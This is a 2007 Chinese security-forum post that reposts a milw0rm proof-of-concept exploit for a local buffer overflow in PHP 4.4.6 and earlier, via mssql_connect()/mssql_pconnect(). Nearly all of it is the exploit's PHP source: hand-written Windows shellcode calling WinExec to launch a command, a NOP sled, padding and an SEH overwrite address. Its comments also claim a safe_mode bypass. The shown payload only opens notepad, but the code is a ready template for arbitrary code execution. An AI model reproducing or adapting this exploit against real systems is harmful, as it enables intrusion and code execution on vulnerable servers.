PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

Helvin

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T顾问团首席顾问

帖子: 667
精华: 22
积分: 5069
阅读权限: 255
在线时间: 1834 小时
注册时间: 2005-1-7
最后登录: 2008-12-3

优秀管理奖运营支持奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-3-7 01:25 只看该作者

PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

引用:

<?php

// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow
// poc exploit (and safe_mode bypass)
// windows 2000 sp3 en / seh overwrite
// by rgod
// site: http://retrogod.altervista.org

// u can easily adjust for php5
// this as my little contribute to MOPB

$____scode=
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\xca\x73\xe9\x77". //WinExec
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\x5c\xcf\xe9\x77". //ExitProcess
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"start notepad & ";

  $eip="\xdc\xf5\x12";
  $____suntzu=str_repeat("\x90",100);
  $____suntzu.=$____scode;
  $____suntzu.=str_repeat("a",2460 - strlen($____scode));
  $____suntzu.=$eip;
  mssql_pconnect($____suntzu);

?>

# milw0rm.com [2007-03-05]

大隐于市

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

PHP &lt;= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

PHP &lt;= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

引用:

PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit